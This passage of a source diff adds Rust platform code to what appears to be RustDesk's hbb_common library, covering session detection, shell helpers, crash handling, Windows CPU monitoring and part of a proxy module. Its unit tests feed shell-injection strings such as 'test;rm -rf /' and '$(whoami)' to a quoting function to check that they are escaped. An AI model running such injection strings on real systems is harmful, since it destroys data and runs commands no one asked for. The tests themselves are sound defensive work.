+        .stdout(std::process::Stdio::piped())
+        .output()
+        .map(|o| !o.stdout.is_empty())
+        .unwrap_or(false)
+}
+
+#[inline]
+pub fn is_gdm_user(username: &str) -> bool {
+    username == "gdm" || username == "sddm"
+    // || username == "lightgdm"
+}
+
+#[inline]
+pub fn is_desktop_wayland() -> bool {
+    get_display_server() == DISPLAY_SERVER_WAYLAND
+}
+
+#[inline]
+pub fn is_x11_or_headless() -> bool {
+    !is_desktop_wayland()
+}
+
+// -1
+const INVALID_SESSION: &str = "4294967295";
+
+pub fn get_display_server() -> String {
+    // Check for forced display server environment variable first
+    if let Ok(forced_display) = std::env::var("RUSTDESK_FORCED_DISPLAY_SERVER") {
+        return forced_display;
+    }
+
+    // Check if `loginctl` can be called successfully
+    if run_loginctl(None).is_err() {
+        return DISPLAY_SERVER_X11.to_owned();
+    }
+
+    let mut session = get_values_of_seat0(&[0])[0].clone();
+    if session.is_empty() {
+        // loginctl has not given the expected output.  try something else.
+        if let Ok(sid) = std::env::var("XDG_SESSION_ID") {
+            // could also execute "cat /proc/self/sessionid"
+            session = sid;
+        }
+        if session.is_empty() {
+            session = run_cmds("cat /proc/self/sessionid").unwrap_or_default();
+            if session == INVALID_SESSION {
+                session = "".to_owned();
+            }
+        }
+    }
+    if session.is_empty() {
+        std::env::var("XDG_SESSION_TYPE").unwrap_or("x11".to_owned())
+    } else {
+        get_display_server_of_session(&session)
+    }
+}
+
+pub fn get_display_server_of_session(session: &str) -> String {
+    let mut display_server = if let Ok(output) =
+        run_loginctl(Some(vec!["show-session", "-p", "Type", session]))
+    // Check session type of the session
+    {
+        String::from_utf8_lossy(&output.stdout)
+            .replace("Type=", "")
+            .trim_end()
+            .into()
+    } else {
+        "".to_owned()
+    };
+    if display_server.is_empty() || display_server == "tty" || display_server == "unspecified" {
+        if let Ok(sestype) = std::env::var("XDG_SESSION_TYPE") {
+            if !sestype.is_empty() {
+                return sestype.to_lowercase();
+            }
+        }
+        display_server = "x11".to_owned();
+    }
+    display_server.to_lowercase()
+}
+
+#[inline]
+fn line_values(indices: &[usize], line: &str) -> Vec<String> {
+    indices
+        .into_iter()
+        .map(|idx| line.split_whitespace().nth(*idx).unwrap_or("").to_owned())
+        .collect::<Vec<String>>()
+}
+
+#[inline]
+pub fn get_values_of_seat0(indices: &[usize]) -> Vec<String> {
+    _get_values_of_seat0(indices, true)
+}
+
+#[inline]
+pub fn get_values_of_seat0_with_gdm_wayland(indices: &[usize]) -> Vec<String> {
+    _get_values_of_seat0(indices, false)
+}
+
+// Ignore "3 sessions listed."
+fn ignore_loginctl_line(line: &str) -> bool {
+    line.contains("sessions") || line.split(" ").count() < 4
+}
+
+fn _get_values_of_seat0(indices: &[usize], ignore_gdm_wayland: bool) -> Vec<String> {
+    if let Ok(output) = run_loginctl(None) {
+        for line in String::from_utf8_lossy(&output.stdout).lines() {
+            if ignore_loginctl_line(line) {
+                continue;
+            }
+            if line.contains("seat0") {
+                if let Some(sid) = line.split_whitespace().next() {
+                    if is_active(sid) {
+                        if ignore_gdm_wayland {
+                            if is_gdm_user(line.split_whitespace().nth(2).unwrap_or(""))
+                                && get_display_server_of_session(sid) == DISPLAY_SERVER_WAYLAND
+                            {
+                                continue;
+                            }
+                        }
+                        return line_values(indices, line);
+                    }
+                }
+            }
+        }
+
+        // some case, there is no seat0 https://github.com/rustdesk/rustdesk/issues/73
+        for line in String::from_utf8_lossy(&output.stdout).lines() {
+            if ignore_loginctl_line(line) {
+                continue;
+            }
+            if let Some(sid) = line.split_whitespace().next() {
+                if is_active(sid) {
+                    let d = get_display_server_of_session(sid);
+                    if ignore_gdm_wayland {
+                        if is_gdm_user(line.split_whitespace().nth(2).unwrap_or(""))
+                            && d == DISPLAY_SERVER_WAYLAND
+                        {
+                            continue;
+                        }
+                    }
+                    if d == "tty" || d == "unspecified" {
+                        continue;
+                    }
+                    return line_values(indices, line);
+                }
+            }
+        }
+    }
+
+    line_values(indices, "")
+}
+
+pub fn is_active(sid: &str) -> bool {
+    if let Ok(output) = run_loginctl(Some(vec!["show-session", "-p", "State", sid])) {
+        String::from_utf8_lossy(&output.stdout).contains("active")
+    } else {
+        false
+    }
+}
+
+pub fn is_active_and_seat0(sid: &str) -> bool {
+    if let Ok(output) = run_loginctl(Some(vec!["show-session", sid])) {
+        String::from_utf8_lossy(&output.stdout).contains("State=active")
+            && String::from_utf8_lossy(&output.stdout).contains("Seat=seat0")
+    } else {
+        false
+    }
+}
+
+// Check both "Lock" and "Switch user"
+pub fn is_session_locked(sid: &str) -> bool {
+    if let Ok(output) = run_loginctl(Some(vec!["show-session", sid, "--property=LockedHint"])) {
+        String::from_utf8_lossy(&output.stdout).contains("LockedHint=yes")
+    } else {
+        false
+    }
+}
+
+// **Note** that the return value here, the last character is '\n'.
+// Use `run_cmds_trim_newline()` if you want to remove '\n' at the end.
+pub fn run_cmds(cmds: &str) -> ResultType<String> {
+    let output = std::process::Command::new(CMD_SH.as_str())
+        .args(vec!["-c", cmds])
+        .output()?;
+    Ok(String::from_utf8_lossy(&output.stdout).to_string())
+}
+
+pub fn run_cmds_trim_newline(cmds: &str) -> ResultType<String> {
+    let output = std::process::Command::new(CMD_SH.as_str())
+        .args(vec!["-c", cmds])
+        .output()?;
+    let out = String::from_utf8_lossy(&output.stdout);
+    Ok(if out.ends_with('\n') {
+        out[..out.len() - 1].to_string()
+    } else {
+        out.to_string()
+    })
+}
+
+fn run_loginctl(args: Option<Vec<&str>>) -> std::io::Result<std::process::Output> {
+    if std::env::var("FLATPAK_ID").is_ok() {
+        let mut l_args = CMD_LOGINCTL.to_string();
+        if let Some(a) = args.as_ref() {
+            l_args = format!("{} {}", l_args, a.join(" "));
+        }
+        let res = std::process::Command::new("flatpak-spawn")
+            .args(vec![String::from("--host"), l_args])
+            .output();
+        if res.is_ok() {
+            return res;
+        }
+    }
+    let mut cmd = std::process::Command::new(CMD_LOGINCTL.as_str());
+    if let Some(a) = args {
+        return cmd.args(a).output();
+    }
+    cmd.output()
+}
+
+/// forever: may not work
+#[cfg(target_os = "linux")]
+pub fn system_message(title: &str, msg: &str, forever: bool) -> ResultType<()> {
+    let cmds: HashMap<&str, Vec<&str>> = HashMap::from([
+        ("notify-send", [title, msg].to_vec()),
+        (
+            "zenity",
+            [
+                "--info",
+                "--timeout",
+                if forever { "0" } else { "3" },
+                "--title",
+                title,
+                "--text",
+                msg,
+            ]
+            .to_vec(),
+        ),
+        ("kdialog", ["--title", title, "--msgbox", msg].to_vec()),
+        (
+            "xmessage",
+            [
+                "-center",
+                "-timeout",
+                if forever { "0" } else { "3" },
+                title,
+                msg,
+            ]
+            .to_vec(),
+        ),
+    ]);
+    for (k, v) in cmds {
+        if Command::new(k).args(v).spawn().is_ok() {
+            return Ok(());
+        }
+    }
+    crate::bail!("failed to post system message");
+}
+
+#[derive(Debug, Clone)]
+pub struct WaylandDisplayInfo {
+    pub name: String,
+    pub x: i32,
+    pub y: i32,
+    pub width: i32,
+    pub height: i32,
+    pub logical_size: Option<(i32, i32)>,
+    pub refresh_rate: i32,
+}
+
+// Retrieves information about all connected displays via the Wayland protocol.
+pub fn get_wayland_displays() -> ResultType<Vec<WaylandDisplayInfo>> {
+    struct WaylandEnv {
+        registry_state: RegistryState,
+        output_state: OutputState,
+    }
+
+    impl OutputHandler for WaylandEnv {
+        fn output_state(&mut self) -> &mut OutputState {
+            &mut self.output_state
+        }
+
+        fn new_output(&mut self, _: &Connection, _: &QueueHandle<Self>, _: WlOutput) {}
+        fn update_output(&mut self, _: &Connection, _: &QueueHandle<Self>, _: WlOutput) {}
+        fn output_destroyed(&mut self, _: &Connection, _: &QueueHandle<Self>, _: WlOutput) {}
+    }
+
+    impl ProvidesRegistryState for WaylandEnv {
+        fn registry(&mut self) -> &mut RegistryState {
+            &mut self.registry_state
+        }
+
+        sctk::registry_handlers!();
+    }
+
+    sctk::delegate_output!(WaylandEnv);
+    sctk::delegate_registry!(WaylandEnv);
+
+    let conn = Connection::connect_to_env()?;
+    let (globals, mut event_queue) = globals::registry_queue_init(&conn)?;
+    let queue_handle = event_queue.handle();
+
+    let registry_state = RegistryState::new(&globals);
+    let output_state = OutputState::new(&globals, &queue_handle);
+
+    let mut environment = WaylandEnv {
+        registry_state,
+        output_state,
+    };
+
+    event_queue.roundtrip(&mut environment)?;
+
+    let outputs: Vec<_> = environment.output_state.outputs().collect();
+    let mut display_infos = Vec::new();
+
+    for output in outputs {
+        if let Some(output_data) = output.data::<OutputData>() {
+            output_data.with_output_info(|info| {
+                if let Some(mode) = info.modes.iter().find(|m| m.current) {
+                    let (x, y) = info.location;
+                    let (width, height) = mode.dimensions;
+                    let refresh_rate = mode.refresh_rate;
+                    let name = info.name.clone().unwrap_or_default();
+                    let logical_size = info.logical_size;
+                    display_infos.push(WaylandDisplayInfo {
+                        name,
+                        x,
+                        y,
+                        width,
+                        height,
+                        logical_size,
+                        refresh_rate,
+                    });
+                }
+            });
+        }
+    }
+
+    Ok(display_infos)
+}
+
+/// Escape a string for safe use in shell commands by wrapping in single quotes.
+///
+/// This function handles the edge case of single quotes within the string by:
+/// 1. Ending the current single-quoted section
+/// 2. Adding an escaped single quote
+/// 3. Starting a new single-quoted section
+///
+/// Example: "it's here" -> "'it'\''s here'"
+#[inline]
+pub fn shell_quote(s: &str) -> String {
+    format!("'{}'", s.replace("'", "'\\''"))
+}
+
+/// Get the current user's home directory via getpwuid (trusted source).
+///
+/// This function uses the system's password database (via `getpwuid`) to retrieve
+/// the home directory, avoiding the security risk of relying on the `HOME`
+/// environment variable which can be manipulated by untrusted input.
+///
+/// # Returns
+/// - `Some(PathBuf)` if the home directory was found and exists
+/// - `None` if the user lookup failed or the directory doesn't exist
+///
+/// # Security
+/// This function is designed to be safe against confused-deputy attacks where
+/// an attacker might manipulate environment variables to influence privileged
+/// operations.
+pub fn get_home_dir_trusted() -> Option<PathBuf> {
+    let uid = get_current_uid();
+    match get_user_by_uid(uid) {
+        Some(user) => {
+            let home = user.home_dir();
+            if Path::is_dir(home) {
+                Some(PathBuf::from(home))
+            } else {
+                log::warn!(
+                    "Home directory for uid {} does not exist or is not a directory: {:?}",
+                    uid,
+                    home
+                );
+                None
+            }
+        }
+        None => {
+            log::warn!("Failed to get user info for uid {}", uid);
+            None
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn test_run_cmds_trim_newline() {
+        assert_eq!(run_cmds_trim_newline("echo -n 123").unwrap(), "123");
+        assert_eq!(run_cmds_trim_newline("echo 123").unwrap(), "123");
+        assert_eq!(
+            run_cmds_trim_newline("whoami").unwrap() + "\n",
+            run_cmds("whoami").unwrap()
+        );
+    }
+
+    /// Test get_home_dir_trusted: returns valid path and ignores HOME env var
+    #[test]
+    fn test_get_home_dir_trusted() {
+        let original_home = std::env::var("HOME").ok();
+
+        // Set HOME to a fake/malicious path
+        std::env::set_var("HOME", "/tmp/fake_malicious_home");
+        let result = get_home_dir_trusted();
+
+        // Restore original HOME
+        match original_home {
+            Some(home) => std::env::set_var("HOME", home),
+            None => std::env::remove_var("HOME"),
+        }
+
+        // Verify: returns valid path that is NOT the fake HOME
+        if let Some(path) = result {
+            assert!(path.is_absolute(), "Path should be absolute: {:?}", path);
+            assert!(path.is_dir(), "Path should be a directory: {:?}", path);
+            assert_ne!(
+                path.to_string_lossy(),
+                "/tmp/fake_malicious_home",
+                "Should not use HOME env var"
+            );
+        }
+    }
+
+    /// Test shell_quote with normal strings
+    #[test]
+    fn test_shell_quote_normal() {
+        assert_eq!(shell_quote("hello"), "'hello'");
+        assert_eq!(shell_quote("/home/user"), "'/home/user'");
+    }
+
+    /// Test shell_quote with spaces
+    #[test]
+    fn test_shell_quote_spaces() {
+        assert_eq!(shell_quote("/home/my user/file"), "'/home/my user/file'");
+        assert_eq!(shell_quote("path with spaces"), "'path with spaces'");
+    }
+
+    /// Test shell_quote with single quotes (the tricky case)
+    #[test]
+    fn test_shell_quote_single_quotes() {
+        assert_eq!(shell_quote("it's"), "'it'\\''s'");
+        assert_eq!(shell_quote("don't stop"), "'don'\\''t stop'");
+    }
+
+    /// Test shell_quote with shell metacharacters
+    #[test]
+    fn test_shell_quote_metacharacters() {
+        // These should all be safely quoted
+        assert_eq!(shell_quote("test;rm -rf /"), "'test;rm -rf /'");
+        assert_eq!(shell_quote("$(whoami)"), "'$(whoami)'");
+        assert_eq!(shell_quote("`id`"), "'`id`'");
+        assert_eq!(shell_quote("a && b"), "'a && b'");
+        assert_eq!(shell_quote("a | b"), "'a | b'");
+    }
+}

--- a/libs/hbb_common/src/platform/macos.rs
+++ b/libs/hbb_common/src/platform/macos.rs
@@ -1,0 +1,55 @@
+use crate::ResultType;
+use osascript;
+use serde_derive::{Deserialize, Serialize};
+
+#[derive(Serialize)]
+struct AlertParams {
+    title: String,
+    message: String,
+    alert_type: String,
+    buttons: Vec<String>,
+}
+
+#[derive(Deserialize)]
+struct AlertResult {
+    #[serde(rename = "buttonReturned")]
+    button: String,
+}
+
+/// Firstly run the specified app, then alert a dialog. Return the clicked button value.
+///
+/// # Arguments
+///
+/// * `app` - The app to execute the script.
+/// * `alert_type` - Alert type. . informational, warning, critical
+/// * `title` - The alert title.
+/// * `message` - The alert message.
+/// * `buttons` - The buttons to show.
+pub fn alert(
+    app: String,
+    alert_type: String,
+    title: String,
+    message: String,
+    buttons: Vec<String>,
+) -> ResultType<String> {
+    let script = osascript::JavaScript::new(&format!(
+        "
+    var App = Application('{}');
+    App.includeStandardAdditions = true;
+    return App.displayAlert($params.title, {{
+        message: $params.message,
+        'as': $params.alert_type,
+        buttons: $params.buttons,
+    }});
+    ",
+        app
+    ));
+
+    let result: AlertResult = script.execute_with_params(AlertParams {
+        title,
+        message,
+        alert_type,
+        buttons,
+    })?;
+    Ok(result.button)
+}

--- a/libs/hbb_common/src/platform/mod.rs
+++ b/libs/hbb_common/src/platform/mod.rs
@@ -1,0 +1,82 @@
+#[cfg(target_os = "linux")]
+pub mod linux;
+
+#[cfg(target_os = "macos")]
+pub mod macos;
+
+#[cfg(target_os = "windows")]
+pub mod windows;
+
+#[cfg(not(debug_assertions))]
+use crate::{config::Config, log};
+#[cfg(not(debug_assertions))]
+use std::process::exit;
+
+#[cfg(not(debug_assertions))]
+static mut GLOBAL_CALLBACK: Option<Box<dyn Fn()>> = None;
+
+#[cfg(not(debug_assertions))]
+extern "C" fn breakdown_signal_handler(sig: i32) {
+    let mut stack = vec![];
+    backtrace::trace(|frame| {
+        backtrace::resolve_frame(frame, |symbol| {
+            if let Some(name) = symbol.name() {
+                stack.push(name.to_string());
+            }
+        });
+        true // keep going to the next frame
+    });
+    let mut info = String::default();
+    if stack.iter().any(|s| {
+        s.contains(&"nouveau_pushbuf_kick")
+            || s.to_lowercase().contains("nvidia")
+            || s.contains("gdk_window_end_draw_frame")
+            || s.contains("glGetString")
+    }) {
+        Config::set_option("allow-always-software-render".to_string(), "Y".to_string());
+        info = "Always use software rendering will be set.".to_string();
+        log::info!("{}", info);
+    }
+    if stack.iter().any(|s| {
+        s.to_lowercase().contains("nvidia")
+            || s.to_lowercase().contains("amf")
+            || s.to_lowercase().contains("mfx")
+            || s.contains("cuProfilerStop")
+    }) {
+        Config::set_option("enable-hwcodec".to_string(), "N".to_string());
+        info = "Perhaps hwcodec causing the crash, disable it first".to_string();
+        log::info!("{}", info);
+    }
+    log::error!(
+        "Got signal {} and exit. stack:\n{}",
+        sig,
+        stack.join("\n").to_string()
+    );
+    if !info.is_empty() {
+        #[cfg(target_os = "linux")]
+        linux::system_message(
+            "RustDesk",
+            &format!("Got signal {} and exit.{}", sig, info),
+            true,
+        )
+        .ok();
+    }
+    unsafe {
+        #[allow(static_mut_refs)]
+        if let Some(callback) = &GLOBAL_CALLBACK {
+            callback()
+        }
+    }
+    exit(0);
+}
+
+#[cfg(not(debug_assertions))]
+pub fn register_breakdown_handler<T>(callback: T)
+where
+    T: Fn() + 'static,
+{
+    unsafe {
+        GLOBAL_CALLBACK = Some(Box::new(callback));
+        libc::signal(libc::SIGSEGV, breakdown_signal_handler as _);
+    }
+}

--- a/libs/hbb_common/src/platform/windows.rs
+++ b/libs/hbb_common/src/platform/windows.rs
@@ -1,0 +1,198 @@
+use std::{
+    collections::VecDeque,
+    sync::{Arc, Mutex},
+    time::Instant,
+};
+use winapi::{
+    shared::minwindef::{DWORD, FALSE, TRUE},
+    um::{
+        handleapi::CloseHandle,
+        pdh::{
+            PdhAddEnglishCounterA, PdhCloseQuery, PdhCollectQueryData, PdhCollectQueryDataEx,
+            PdhGetFormattedCounterValue, PdhOpenQueryA, PDH_FMT_COUNTERVALUE, PDH_FMT_DOUBLE,
+            PDH_HCOUNTER, PDH_HQUERY,
+        },
+        synchapi::{CreateEventA, WaitForSingleObject},
+        sysinfoapi::VerSetConditionMask,
+        winbase::{VerifyVersionInfoW, INFINITE, WAIT_OBJECT_0},
+        winnt::{
+            HANDLE, OSVERSIONINFOEXW, VER_BUILDNUMBER, VER_GREATER_EQUAL, VER_MAJORVERSION,
+            VER_MINORVERSION, VER_SERVICEPACKMAJOR, VER_SERVICEPACKMINOR,
+        },
+    },
+};
+
+lazy_static::lazy_static! {
+    static ref CPU_USAGE_ONE_MINUTE: Arc<Mutex<Option<(f64, Instant)>>> = Arc::new(Mutex::new(None));
+}
+
+// https://github.com/mgostIH/process_list/blob/master/src/windows/mod.rs
+#[repr(transparent)]
+pub struct RAIIHandle(pub HANDLE);
+
+impl Drop for RAIIHandle {
+    fn drop(&mut self) {
+        // This never gives problem except when running under a debugger.
+        unsafe { CloseHandle(self.0) };
+    }
+}
+
+#[repr(transparent)]
+pub(self) struct RAIIPDHQuery(pub PDH_HQUERY);
+
+impl Drop for RAIIPDHQuery {
+    fn drop(&mut self) {
+        unsafe { PdhCloseQuery(self.0) };
+    }
+}
+
+pub fn start_cpu_performance_monitor() {
+    // Code from:
+    // https://learn.microsoft.com/en-us/windows/win32/perfctrs/collecting-performance-data
+    // https://learn.microsoft.com/en-us/windows/win32/api/pdh/nf-pdh-pdhcollectquerydataex
+    // Why value lower than taskManager:
+    // https://aaron-margosis.medium.com/task-managers-cpu-numbers-are-all-but-meaningless-2d165b421e43
+    // Therefore we should compare with Precess Explorer rather than taskManager
+
+    let f = || unsafe {
+        // load avg or cpu usage, test with prime95.
+        // Prefer cpu usage because we can get accurate value from Precess Explorer.
+        // const COUNTER_PATH: &'static str = "\\System\\Processor Queue Length\0";
+        const COUNTER_PATH: &'static str = "\\Processor(_total)\\% Processor Time\0";
+        const SAMPLE_INTERVAL: DWORD = 2; // 2 second
+
+        let mut ret;
+        let mut query: PDH_HQUERY = std::mem::zeroed();
+        ret = PdhOpenQueryA(std::ptr::null() as _, 0, &mut query);
+        if ret != 0 {
+            log::error!("PdhOpenQueryA failed: 0x{:X}", ret);
+            return;
+        }
+        let _query = RAIIPDHQuery(query);
+        let mut counter: PDH_HCOUNTER = std::mem::zeroed();
+        ret = PdhAddEnglishCounterA(query, COUNTER_PATH.as_ptr() as _, 0, &mut counter);
+        if ret != 0 {
+            log::error!("PdhAddEnglishCounterA failed: 0x{:X}", ret);
+            return;
+        }
+        ret = PdhCollectQueryData(query);
+        if ret != 0 {
+            log::error!("PdhCollectQueryData failed: 0x{:X}", ret);
+            return;
+        }
+        let mut _counter_type: DWORD = 0;
+        let mut counter_value: PDH_FMT_COUNTERVALUE = std::mem::zeroed();
+        let event = CreateEventA(std::ptr::null_mut(), FALSE, FALSE, std::ptr::null() as _);
+        if event.is_null() {
+            log::error!("CreateEventA failed");
+            return;
+        }
+        let _event: RAIIHandle = RAIIHandle(event);
+        ret = PdhCollectQueryDataEx(query, SAMPLE_INTERVAL, event);
+        if ret != 0 {
+            log::error!("PdhCollectQueryDataEx failed: 0x{:X}", ret);
+            return;
+        }
+
+        let mut queue: VecDeque<f64> = VecDeque::new();
+        let mut recent_valid: VecDeque<bool> = VecDeque::new();
+        loop {
+            // latest one minute
+            if queue.len() == 31 {
+                queue.pop_front();
+            }
+            if recent_valid.len() == 31 {
+                recent_valid.pop_front();
+            }
+            // allow get value within one minute
+            if queue.len() > 0 && recent_valid.iter().filter(|v| **v).count() > queue.len() / 2 {
+                let sum: f64 = queue.iter().map(|f| f.to_owned()).sum();
+                let avg = sum / (queue.len() as f64);
+                *CPU_USAGE_ONE_MINUTE.lock().unwrap() = Some((avg, Instant::now()));
+            } else {
+                *CPU_USAGE_ONE_MINUTE.lock().unwrap() = None;
+            }
+            if WAIT_OBJECT_0 != WaitForSingleObject(event, INFINITE) {
+                recent_valid.push_back(false);
+                continue;
+            }
+            if PdhGetFormattedCounterValue(
+                counter,
+                PDH_FMT_DOUBLE,
+                &mut _counter_type,
+                &mut counter_value,
+            ) != 0
+                || counter_value.CStatus != 0
+            {
+                recent_valid.push_back(false);
+                continue;
+            }
+            queue.push_back(counter_value.u.doubleValue().clone());
+            recent_valid.push_back(true);
+        }
+    };
+    use std::sync::Once;
+    static ONCE: Once = Once::new();
+    ONCE.call_once(|| {
+        std::thread::spawn(f);
+    });
+}
+
+pub fn cpu_uage_one_minute() -> Option<f64> {
+    let v = CPU_USAGE_ONE_MINUTE.lock().unwrap().clone();
+    if let Some((v, instant)) = v {
+        if instant.elapsed().as_secs() < 30 {
+            return Some(v);
+        }
+    }
+    None
+}
+
+pub fn sync_cpu_usage(cpu_usage: Option<f64>) {
+    let v = match cpu_usage {
+        Some(cpu_usage) => Some((cpu_usage, Instant::now())),
+        None => None,
+    };
+    *CPU_USAGE_ONE_MINUTE.lock().unwrap() = v;
+    log::info!("cpu usage synced: {:?}", cpu_usage);
+}
+
+// https://learn.microsoft.com/en-us/windows/win32/sysinfo/targeting-your-application-at-windows-8-1
+// https://github.com/nodejs/node-convergence-archive/blob/e11fe0c2777561827cdb7207d46b0917ef3c42a7/deps/uv/src/win/util.c#L780
+pub fn is_windows_version_or_greater(
+    os_major: u32,
+    os_minor: u32,
+    build_number: u32,
+    service_pack_major: u32,
+    service_pack_minor: u32,
+) -> bool {
+    let mut osvi: OSVERSIONINFOEXW = unsafe { std::mem::zeroed() };
+    osvi.dwOSVersionInfoSize = std::mem::size_of::<OSVERSIONINFOEXW>() as DWORD;
+    osvi.dwMajorVersion = os_major as _;
+    osvi.dwMinorVersion = os_minor as _;
+    osvi.dwBuildNumber = build_number as _;
+    osvi.wServicePackMajor = service_pack_major as _;
+    osvi.wServicePackMinor = service_pack_minor as _;
+
+    let result = unsafe {
+        let mut condition_mask = 0;
+        let op = VER_GREATER_EQUAL;
+        condition_mask = VerSetConditionMask(condition_mask, VER_MAJORVERSION, op);
+        condition_mask = VerSetConditionMask(condition_mask, VER_MINORVERSION, op);
+        condition_mask = VerSetConditionMask(condition_mask, VER_BUILDNUMBER, op);
+        condition_mask = VerSetConditionMask(condition_mask, VER_SERVICEPACKMAJOR, op);
+        condition_mask = VerSetConditionMask(condition_mask, VER_SERVICEPACKMINOR, op);
+
+        VerifyVersionInfoW(
+            &mut osvi as *mut OSVERSIONINFOEXW,
+            VER_MAJORVERSION
+                | VER_MINORVERSION
+                | VER_BUILDNUMBER
+                | VER_SERVICEPACKMAJOR
+                | VER_SERVICEPACKMINOR,
+            condition_mask,
+        )
+    };
+
+    result == TRUE
+}

--- a/libs/hbb_common/src/protos/mod.rs
+++ b/libs/hbb_common/src/protos/mod.rs
@@ -1,0 +1,1 @@
+include!(concat!(env!("OUT_DIR"), "/protos/mod.rs"));

--- a/libs/hbb_common/src/proxy.rs
+++ b/libs/hbb_common/src/proxy.rs
@@ -1,0 +1,716 @@
+use std::{
+    io::Error as IoError,
+    net::{SocketAddr, ToSocketAddrs},
+};
+
+use anyhow::bail;
+use async_recursion::async_recursion;
+use base64::{engine::general_purpose, Engine};
+use httparse::{Error as HttpParseError, Response, EMPTY_HEADER};
+use thiserror::Error as ThisError;
+use tokio::io::{AsyncRead, AsyncWrite, AsyncWriteExt, BufStream};
+use tokio_native_tls::{native_tls, TlsConnector, TlsStream};
+use tokio_rustls::{client::TlsStream as RustlsTlsStream, TlsConnector as RustlsTlsConnector};
+use tokio_socks::{tcp::Socks5Stream, IntoTargetAddr, TargetAddr};
+use tokio_util::codec::Framed;
+use url::Url;
+
+use crate::{
+    bytes_codec::BytesCodec,
+    config::Socks5Server,
+    tcp::{DynTcpStream, FramedStream},
+    tls::{get_cached_tls_accept_invalid_cert, get_cached_tls_type, upsert_tls_cache, TlsType},
+    ResultType,
+};
+
+#[derive(Debug, ThisError)]
+pub enum ProxyError {
+    #[error("IO Error: {0}")]
+    IoError(#[from] IoError),
+    #[error("Target parse error: {0}")]
+    TargetParseError(String),
+    #[error("HTTP parse error: {0}")]
+    HttpParseError(#[from] HttpParseError),
+    #[error("The maximum response header length is exceeded: {0}")]
+    MaximumResponseHeaderLengthExceeded(usize),
+    #[error("The end of file is reached")]
+    EndOfFile,
+    #[error("The url is error: {0}")]
+    UrlBadScheme(String),
+    #[error("The url parse error: {0}")]
+    UrlParseScheme(#[from] url::ParseError),
+    #[error("No HTTP code was found in the response")]
+    NoHttpCode,
+    #[error("The HTTP code is not equal 200: {0}")]
+    HttpCode200(u16),
+    #[error("The proxy address resolution failed: {0}")]
+    AddressResolutionFailed(String),
+    #[error("The native tls error: {0}")]
+    NativeTlsError(#[from] tokio_native_tls::native_tls::Error),
+}
+
+const MAXIMUM_RESPONSE_HEADER_LENGTH: usize = 4096;
+/// The maximum HTTP Headers, which can be parsed.
+const MAXIMUM_RESPONSE_HEADERS: usize = 16;
+const DEFINE_TIME_OUT: u64 = 600;
+
+pub trait IntoUrl {
+    // Besides parsing as a valid `Url`, the `Url` must be a valid
+    // `http::Uri`, in that it makes sense to use in a network request.
+    fn into_url(self) -> Result<Url, ProxyError>;
+
+    fn as_str(&self) -> &str;
+}
+
+impl IntoUrl for Url {
+    fn into_url(self) -> Result<Url, ProxyError> {
+        if self.has_host() {
+            Ok(self)
+        } else {
+            Err(ProxyError::UrlBadScheme(self.to_string()))
+        }
+    }
+
+    fn as_str(&self) -> &str {
+        self.as_ref()
+    }
+}
+
+impl<'a> IntoUrl for &'a str {
+    fn into_url(self) -> Result<Url, ProxyError> {
+        Url::parse(self)
+            .map_err(ProxyError::UrlParseScheme)?
+            .into_url()
+    }
+
+    fn as_str(&self) -> &str {
+        self
+    }
+}
+
+impl<'a> IntoUrl for &'a String {
+    fn into_url(self) -> Result<Url, ProxyError> {
+        (&**self).into_url()
+    }
+
+    fn as_str(&self) -> &str {
+        self.as_ref()
+    }
+}
+
+impl<'a> IntoUrl for String {
+    fn into_url(self) -> Result<Url, ProxyError> {
+        (&*self).into_url()
+    }
+
+    fn as_str(&self) -> &str {
+        self.as_ref()
+    }
+}
+
+#[derive(Clone)]
+pub struct Auth {
+    user_name: String,
+    password: String,
+}
+
+impl Auth {
+    fn get_proxy_authorization(&self) -> String {
+        format!(
+            "Proxy-Authorization: Basic {}\r\n",
+            self.get_basic_authorization()
+        )
+    }
+
+    pub fn get_basic_authorization(&self) -> String {
+        let authorization = format!("{}:{}", &self.user_name, &self.password);
+        general_purpose::STANDARD.encode(authorization.as_bytes())
+    }
+
+    pub fn username(&self) -> &str {
+        &self.user_name
+    }
+
+    pub fn password(&self) -> &str {
+        &self.password
+    }
+}
+
+#[derive(Clone)]
+pub enum ProxyScheme {
+    Http {
+        auth: Option<Auth>,
+        host: String,
+    },
+    Https {
+        auth: Option<Auth>,
+        host: String,
+    },
+    Socks5 {
+        addr: SocketAddr,
+        auth: Option<Auth>,
+        remote_dns: bool,
+    },
+}
+
+impl ProxyScheme {
+    pub fn maybe_auth(&self) -> Option<&Auth> {
+        match self {
+            ProxyScheme::Http { auth, .. }
+            | ProxyScheme::Https { auth, .. }
+            | ProxyScheme::Socks5 { auth, .. } => auth.as_ref(),
+        }
+    }
+
+    fn socks5(addr: SocketAddr) -> Result<Self, ProxyError> {
+        Ok(ProxyScheme::Socks5 {
+            addr,
+            auth: None,
+            remote_dns: false,
+        })
+    }
+
+    fn http(host: &str) -> Result<Self, ProxyError> {
+        Ok(ProxyScheme::Http {
+            auth: None,
+            host: host.to_string(),
+        })
+    }
+    fn https(host: &str) -> Result<Self, ProxyError> {
+        Ok(ProxyScheme::Https {
+            auth: None,
+            host: host.to_string(),
+        })
+    }
+
+    fn set_basic_auth<T: Into<String>, U: Into<String>>(&mut self, username: T, password: U) {
+        let auth = Auth {
+            user_name: username.into(),
+            password: password.into(),
+        };
+        match self {
+            ProxyScheme::Http { auth: a, .. } => *a = Some(auth),
+            ProxyScheme::Https { auth: a, .. } => *a = Some(auth),
+            ProxyScheme::Socks5 { auth: a, .. } => *a = Some(auth),
+        }
+    }
+
+    fn parse(url: Url) -> Result<Self, ProxyError> {
+        use url::Position;
+
+        // Resolve URL to a host and port
+        let to_addr = || {
+            let addrs = url.socket_addrs(|| match url.scheme() {
+                "socks5" => Some(1080),
+                _ => None,
+            })?;
+            addrs
+                .into_iter()
+                .next()
+                .ok_or_else(|| ProxyError::UrlParseScheme(url::ParseError::EmptyHost))
+        };
+
+        let mut scheme: Self = match url.scheme() {
+            "http" => Self::http(&url[Position::BeforeHost..Position::AfterPort])?,
+            "https" => Self::https(&url[Position::BeforeHost..Position::AfterPort])?,
+            "socks5" => Self::socks5(to_addr()?)?,
+            e => return Err(ProxyError::UrlBadScheme(e.to_string())),
+        };
+
+        if let Some(pwd) = url.password() {
+            let username = url.username();
+            scheme.set_basic_auth(username, pwd);
+        }
+
+        Ok(scheme)
+    }
+    pub async fn socket_addrs(&self) -> Result<SocketAddr, ProxyError> {
+        log::trace!("Resolving socket address");
+        match self {
+            ProxyScheme::Http { host, .. } => self.resolve_host(host, 80).await,
